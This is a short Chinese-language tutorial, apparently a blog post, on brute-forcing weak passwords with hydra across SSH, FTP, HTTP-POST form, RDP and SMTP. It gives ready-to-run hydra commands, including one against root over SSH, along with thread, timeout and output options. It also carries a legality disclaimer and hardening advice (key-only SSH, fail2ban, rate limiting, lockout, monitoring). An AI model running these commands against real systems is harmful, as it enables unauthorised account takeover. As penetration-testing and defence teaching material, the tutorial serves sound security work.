hydra 弱口令爆破实战:SSH/FTP/HTTP-POST/RDP/SMTP 多协议爆破,防御加固完整方案。
写在前面:合法学习边界
弱口令爆破只在授权测试环境进行。对非授权目标爆破可能触犯法律。
一、hydra 协议矩阵

1
| SSH · FTP · HTTP-POST · RDP · SMTP · Telnet · MySQL · SMB · RSYNC
|
二、常用命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # SSH 爆破
hydra -l root -P rockyou.txt ssh://192.168.1.100
# HTTP POST 表单
hydra -l admin -P pass.txt http-post-form "http://target/login.php:user=^USER^&pass=^PASS^:F=login failed"
# 多线程
hydra -l admin -P pass.txt ssh://target -t 64
# 防断连
hydra -l admin -P pass.txt ssh://target -w 30
# 输出保存
hydra -l admin -P pass.txt ssh://target -o result.log
|
三、防御加固
1
2
3
4
| SSH:关闭密码登录 · 仅密钥 · fail2ban
Web:验证码 · 登录频率限制 · 账户锁定策略
密码:最低8位 · 大小写+数字+特殊字符
监控:审计登录日志 · 异常登录告警
|
四、小结
hydra 支持 50+ 协议爆破。防御核心是强密码策略 + 账户锁定 + 行为监控,三者缺一不可。